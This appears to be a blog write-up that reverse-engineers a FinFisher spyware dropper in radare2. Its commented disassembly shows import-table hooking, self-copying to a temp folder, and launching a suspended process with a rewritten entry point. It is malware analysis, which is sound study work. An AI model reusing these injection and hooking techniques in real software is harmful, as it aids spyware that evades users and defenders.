Fork me on GitHub

First lookup to FinFisher binary

In this short writeup i will take a look at one of the finfisher1.exe.bin dropper with the help of radare2. It will describe just the creation of the new process and everything related to this. Another article will be released at a later date for the more interesting stuff. Part 2 Part 3 Part 4

Filename sha256
finfisher.1.bin.exe f827c92fbe832db3f09f47fe0dcaafd89b40c7064ab90833a1f418f2d1e75e8e
  • As there is no real protection or hiding stuff contained in this file i will try to move fast through it. The most interesting function in this binary is located at 0x00402369. It searches the imports for 'user32.dll'. After that it changes the addresses of RegisterClassEx with 0x004019ef and CreateWindowExW with 0x00402228.
0x00402369    8bff         mov edi, edi
0x0040236b    55           push ebp
0x0040236c    8bec         mov ebp, esp
0x0040236e    51           push ecx
0x0040236f    51           push ecx
0x00402370    53           push ebx
0x00402371    56           push esi
0x00402372    6a00         push 0x0
0x00402374    ff1514104000 call dword [reloc.KERNEL32.dll_GetModuleHandleW]
0x0040237a    8bf0         mov esi, eax
0x0040237c    8b463c       mov eax, [esi+0x3c]
0x0040237f    8b9c3080000. mov ebx, [eax+esi+0x80]
0x00402386    03de         add ebx, esi
0x00402388    8b430c       mov eax, [ebx+0xc]
0x0040238b    85c0         test eax, eax
0x0040238d    8975f8       mov [ebp-0x8], esi
0x00402390    0f84c8000000 je 0x40245e
0x00402396    57           push edi
0x00402397    03c6         add eax, esi
0x00402399    6828134000   push 0x401328 ; 0x00401328   ; user32.dll
0x0040239e    50           push eax
0x0040239f    ff1548114000 call dword [reloc.msvcrt.dll__stricmp]
0x004023a5    85c0         test eax, eax
0x004023a7    59           pop ecx
0x004023a8    59           pop ecx
0x004023a9    0f85a0000000 jne 0x40244f
0x004023af    8b3b         mov edi, [ebx]
0x004023b1    03fe         add edi, esi
0x004023b3    8b7310       mov esi, [ebx+0x10]
0x004023b6    0375f8       add esi, [ebp-0x8]
0x004023b9    e984000000   jmp 0x402442 ; (HookRegisterClassExWAndCreateWindowExW)
0x004023be    8b4df8       mov ecx, [ebp-0x8]
0x004023c1    8d440802     lea eax, [eax+ecx+0x2]
0x004023c5    6814134000   push 0x401314 ; 0x00401314   ; RegisterClassExW
0x004023ca    50           push eax
0x004023cb    ff1548114000 call dword [reloc.msvcrt.dll__stricmp]
0x004023d1    85c0         test eax, eax
0x004023d3    59           pop ecx
0x004023d4    59           pop ecx
0x004023d5    7525         jne 0x4023fc
0x004023d7    8d45fc       lea eax, [ebp-0x4]
0x004023da    50           push eax
0x004023db    6a40         push 0x40 ; '@'
0x004023dd    6a04         push 0x4
0x004023df    56           push esi
0x004023e0    ff1544104000 call dword [reloc.KERNEL32.dll_VirtualProtect]
0x004023e6    8d45fc       lea eax, [ebp-0x4]
0x004023e9    50           push eax
0x004023ea    c706ef194000 mov dword [esi], fcn.004019ef  ; hook RegisterClassExW
0x004023f0    ff75fc       push dword [ebp-0x4]
0x004023f3    6a04         push 0x4
0x004023f5    56           push esi
0x004023f6    ff1544104000 call dword [reloc.KERNEL32.dll_VirtualProtect]
0x004023fc    8b07         mov eax, [edi]
0x004023fe    8b4df8       mov ecx, [ebp-0x8]
0x00402401    8d440802     lea eax, [eax+ecx+0x2]
0x00402405    6804134000   push 0x401304 ; 0x00401304   ; CreateWindowExW
0x0040240a    50           push eax
0x0040240b    ff1548114000 call dword [reloc.msvcrt.dll__stricmp]
0x00402411    85c0         test eax, eax
0x00402413    59           pop ecx
0x00402414    59           pop ecx
0x00402415    7525         jne 0x40243c
0x00402417    8d45fc       lea eax, [ebp-0x4]
0x0040241a    50           push eax
0x0040241b    6a40         push 0x40 ; '@'
0x0040241d    6a04         push 0x4
0x0040241f    56           push esi
0x00402420    ff1544104000 call dword [reloc.KERNEL32.dll_VirtualProtect]
0x00402426    8d45fc       lea eax, [ebp-0x4]
0x00402429    50           push eax
0x0040242a    c70628224000 mov dword [esi], fcn.00402228  ; hook CreateWindowExW with  00402228
0x00402430    ff75fc       push dword [ebp-0x4]
0x00402433    6a04         push 0x4
0x00402435    56           push esi
0x00402436    ff1544104000 call dword [reloc.KERNEL32.dll_VirtualProtect]
0x0040243c    83c704       add edi, 0x4
0x0040243f    83c604       add esi, 0x4
0x00402442    8b07         mov eax, [edi]
0x00402444    85c0         test eax, eax
0x00402446    0f8572ffffff jne 0x4023be
0x0040244c    8b75f8       mov esi, [ebp-0x8]
0x0040244f    8b4320       mov eax, [ebx+0x20]
0x00402452    83c314       add ebx, 0x14
0x00402455    85c0         test eax, eax
0x00402457    0f853affffff jne 0x402397
0x0040245d    5f           pop edi
0x0040245e    5e           pop esi
0x0040245f    5b           pop ebx
0x00402460    c9           leave
0x00402461    c3           ret
  • The RegisterClassExW function is called at 0x00401638.
0x00401638    ff1500114000 call dword [reloc.USER32.dll_RegisterClassExW] ;[2]  ; goto hooked func: 0x004019ef
  • This function creates a new folder at 'GetTempPathW' (normally its C:\Users\Username\AppData\Local\Temp) location with the name TMP'rdtsc' (rdtsc reads a timestamp into eax:edx, the result here is combined through a simple 'or' instruction). Finally we copy the binary (we read the path/filename from the current binary through GetModuleFileNameW) to the new created folder.
0x004019f1    55           push ebp
0x004019f2    8bec         mov ebp, esp
0x004019f4    81ec1c060000 sub esp, 0x61c
0x004019fa    a100404000   mov eax, []
0x004019ff    33c5         xor eax, ebp
0x00401a01    8945fc       mov [ebp-0x4], eax
0x00401a04    53           push ebx
0x00401a05    56           push esi
0x00401a06    57           push edi
0x00401a07    be04010000   mov esi, 0x104 ; 0x00000104 
0x00401a0c    56           push esi
0x00401a0d    68a0484000   push 0x4048a0 ; 0x004048a0 
0x00401a12    6a00         push 0x0
0x00401a14    ff1514104000 call dword [reloc.KERNEL32.dll_GetModuleHandleW]  ; get handle to current process
0x00401a1a    50           push eax
0x00401a1b    ff1510104000 call dword [reloc.KERNEL32.dll_GetModuleFileNameW]  ; get path to the binary and save to 0x4048a0
0x00401a21    8bf8         mov edi, eax                ; len of the string to edi
0x00401a23    8d85e4f9ffff lea eax, [ebp-0x61c]
0x00401a29    50           push eax
0x00401a2a    56           push esi
0x00401a2b    ff150c104000 call dword [reloc.KERNEL32.dll_GetTempPathW]  ; returns the path of the temp folder
0x00401a31    8d3c7da0484. lea edi, [edi*2+0x4048a0]   ; pinter to the last char of the string
0x00401a38    eb02         jmp 0x401a3c ; (fcn.00401a3a)
0x00401a3a    4f           dec edi
0x00401a3b    4f           dec edi
0x00401a3c    66833f5c     cmp word [edi], 0x5c        ; search for the first backslash
0x00401a40    75f8         jne fcn.00401a3a
0x00401a42    0f31         rdtsc                       ; read timestamp counter to edx:eax
0x00401a44    0bc2         or eax, edx                 ; or the result
0x00401a46    50           push eax
0x00401a47    68a8114000   push 0x4011a8 ; 0x004011a8   ; format string: TMP% 08X%
0x00401a4c    8d85ecfbffff lea eax, [ebp-0x414]        ; this buffer contains the resulting string (TMP<OREDDATE>)
0x00401a52    56           push esi
0x00401a53    50           push eax
0x00401a54    e8f9feffff   call vsnwprintf_wrapper
0x00401a59    8d85ecfbffff lea eax, [ebp-0x414]        ; addr of result to eax
0x00401a5f    50           push eax
0x00401a60    8d85e4f9ffff lea eax, [ebp-0x61c]        ; temp path
0x00401a66    50           push eax
0x00401a67    bb9c114000   mov ebx, 0x40119c ; 0x0040119c   ; %s\%s
0x00401a6c    53           push ebx
0x00401a6d    8d85f4fdffff lea eax, [ebp-0x20c]
0x00401a73    56           push esi
0x00401a74    50           push eax
0x00401a75    e8d8feffff   call vsnwprintf_wrapper
0x00401a7a    83c424       add esp, 0x24
0x00401a7d    6a00         push 0x0
0x00401a7f    8d85f4fdffff lea eax, [ebp-0x20c]
0x00401a85    50           push eax
0x00401a86    ff1508104000 call dword [reloc.KERNEL32.dll_CreateDirectoryW]
0x00401a8c    83c702       add edi, 0x2
0x00401a8f    57           push edi
0x00401a90    8d85f4fdffff lea eax, [ebp-0x20c]
0x00401a96    50           push eax
0x00401a97    53           push ebx
0x00401a98    56           push esi
0x00401a99    be80464000   mov esi, 0x404680 ; 0x00404680 
0x00401a9e    56           push esi
0x00401a9f    e8aefeffff   call vsnwprintf_wrapper
0x00401aa4    83c414       add esp, 0x14
0x00401aa7    6a00         push 0x0
0x00401aa9    56           push esi
0x00401aaa    68a0484000   push 0x4048a0 ; 0x004048a0 
0x00401aaf    ff1504104000 call dword [reloc.KERNEL32.dll_CopyFileW]  ; copy the dropper to the new created directory
0x00401ab5    8b4dfc       mov ecx, [ebp-0x4]
0x00401ab8    5f           pop edi
0x00401ab9    33c0         xor eax, eax
0x00401abb    5e           pop esi
0x00401abc    33cd         xor ecx, ebp
0x00401abe    40           inc eax
0x00401abf    5b           pop ebx
0x00401ac0    e8030f0000   call fcn.004029c8
0x00401ac5    c9           leave
0x00401ac6    c20400       ret 0x4
  • The call to CreateWindowHookEx is located at 0x004014b3.
0x004014b3    ff15f0104000 call dword [reloc.USER32.dll_CreateWindowExW] ;[1]
  • This function starts a new process with 'CREATE_SUSPENDED' status so that the new process will stay at the entry point of the binary. After that the function GetThreadContext returns the current context of the main thread of the new created binary. Now we write 0x401e1f to the CONTEXT struct as eip so if we resume this process, the binary will start at this address. Before the thread is resumed, the path to the current executable and a duplicated process handle are written through WriteProcessMemory in the new process. Our short journey will end at TerminateProcess. In the next article i will write more about the new process that starts at 0x401e1f.
0x00402228    8bff         mov edi, edi
0x0040222a    55           push ebp
0x0040222b    8bec         mov ebp, esp
0x0040222d    81ec28030000 sub esp, 0x328
0x00402233    a100404000   mov eax, []
0x00402238    33c5         xor eax, ebp
0x0040223a    8945fc       mov [ebp-0x4], eax
0x0040223d    53           push ebx
0x0040223e    56           push esi
0x0040223f    57           push edi
0x00402240    33c0         xor eax, eax
0x00402242    8dbd20fdffff lea edi, [ebp-0x2e0]
0x00402248    ab           stosd
0x00402249    ab           stosd
0x0040224a    ab           stosd
0x0040224b    6a44         push 0x44 ; 'D'
0x0040224d    ab           stosd
0x0040224e    33f6         xor esi, esi
0x00402250    8d85d8fcffff lea eax, [ebp-0x328]
0x00402256    56           push esi
0x00402257    50           push eax
0x00402258    e87f070000   call sub.msvcrt.dll_memset_9dc
0x0040225d    83c40c       add esp, 0xc
0x00402260    8d8520fdffff lea eax, [ebp-0x2e0]
0x00402266    50           push eax
0x00402267    8d85d8fcffff lea eax, [ebp-0x328]
0x0040226d    50           push eax
0x0040226e    56           push esi
0x0040226f    56           push esi
0x00402270    6a04         push 0x4 ; esp              ; CREATE_SUSPENDED
0x00402272    56           push esi
0x00402273    56           push esi
0x00402274    56           push esi
0x00402275    56           push esi
0x00402276    6880464000   push 0x404680 ; 0x00404680   ; temppath+copiedbinary
0x0040227b    ff1540104000 call dword [reloc.KERNEL32.dll_CreateProcessW]  ; create a new process with the copied binary in suspended mode
0x00402281    8d8530fdffff lea eax, [ebp-0x2d0]
0x00402287    50           push eax
0x00402288    ffb524fdffff push dword [ebp-0x2dc]
0x0040228e    c78530fdfff. mov dword [ebp-0x2d0], 0x10007
0x00402298    ff1574104000 call dword [reloc.KERNEL32.dll_GetThreadContext]
0x0040229e    8d8530fdffff lea eax, [ebp-0x2d0]
0x004022a4    50           push eax
0x004022a5    ffb524fdffff push dword [ebp-0x2dc]
0x004022ab    c785e0fdfff. mov dword [ebp-0x220], fcn.00401e1f  ; change the ModuleEntryPoint to 0x401e1f
0x004022b5    ff1570104000 call dword [reloc.KERNEL32.dll_SetThreadContext]
0x004022bb    8b1d6c104000 mov ebx, [reloc.KERNEL32.dll_WriteProcessMemory]
0x004022c1    56           push esi
0x004022c2    6808020000   push 0x208 ; 0x00000208 
0x004022c7    b8a0484000   mov eax, 0x4048a0 ; 0x004048a0   ; copy the path from the current binary to the new process
0x004022cc    50           push eax
0x004022cd    50           push eax
0x004022ce    ffb520fdffff push dword [ebp-0x2e0]
0x004022d4    ffd3         call ebx                    ; call WriteProcessMemory
0x004022d6    ff153c104000 call dword [reloc.KERNEL32.dll_GetCurrentProcessId]
0x004022dc    50           push eax                    ; eax contains current process id
0x004022dd    56           push esi
0x004022de    68ff0f1f00   push 0x1f0fff ; 0x001f0fff   ; PROCESS_ALL_ACCESS
0x004022e3    ff1538104000 call dword [reloc.KERNEL32.dll_OpenProcess]
0x004022e9    6a02         push 0x2 ; eip              ; DUPLICATE_SAME_ACCESS
0x004022eb    56           push esi
0x004022ec    56           push esi
0x004022ed    bfa84a4000   mov edi, 0x404aa8 ; 0x00404aa8 
0x004022f2    57           push edi                    ; destination for the duplicated handle
0x004022f3    ffb520fdffff push dword [ebp-0x2e0]
0x004022f9    89851cfdffff mov [ebp-0x2e4], eax
0x004022ff    50           push eax
0x00402300    ff1534104000 call dword [reloc.KERNEL32.dll_GetCurrentProcess]
0x00402306    50           push eax
0x00402307    ff1530104000 call dword [reloc.KERNEL32.dll_DuplicateHandle]
0x0040230d    56           push esi
0x0040230e    6a04         push 0x4 ; esp
0x00402310    57           push edi
0x00402311    57           push edi
0x00402312    ffb520fdffff push dword [ebp-0x2e0]
0x00402318    ffd3         call ebx                    ; WriteProcessMemory (the duplicated handle)
0x0040231a    ffb524fdffff push dword [ebp-0x2dc]
0x00402320    ff151c104000 call dword [reloc.KERNEL32.dll_ResumeThread]  ; point of no return (resume the new created process)
0x00402326    ffb51cfdffff push dword [ebp-0x2e4]
0x0040232c    8b3d18104000 mov edi, [reloc.KERNEL32.dll_CloseHandle]
0x00402332    ffd7         call edi
0x00402334    ffb520fdffff push dword [ebp-0x2e0]
0x0040233a    ffd7         call edi
0x0040233c    ffb524fdffff push dword [ebp-0x2dc]
0x00402342    ffd7         call edi
0x00402344    56           push esi
0x00402345    ff1534104000 call dword [reloc.KERNEL32.dll_GetCurrentProcess]
0x0040234b    50           push eax
0x0040234c    ff1520104000 call dword [reloc.KERNEL32.dll_TerminateProcess]
0x00402352    8b4dfc       mov ecx, [ebp-0x4]
0x00402355    5f           pop edi
0x00402356    33c0         xor eax, eax
0x00402358    5e           pop esi
0x00402359    33cd         xor ecx, ebp
0x0040235b    40           inc eax
0x0040235c    5b           pop ebx
0x0040235d    e866060000   call fcn.004029c8
0x00402362    c9           leave
0x00402363    c3           ret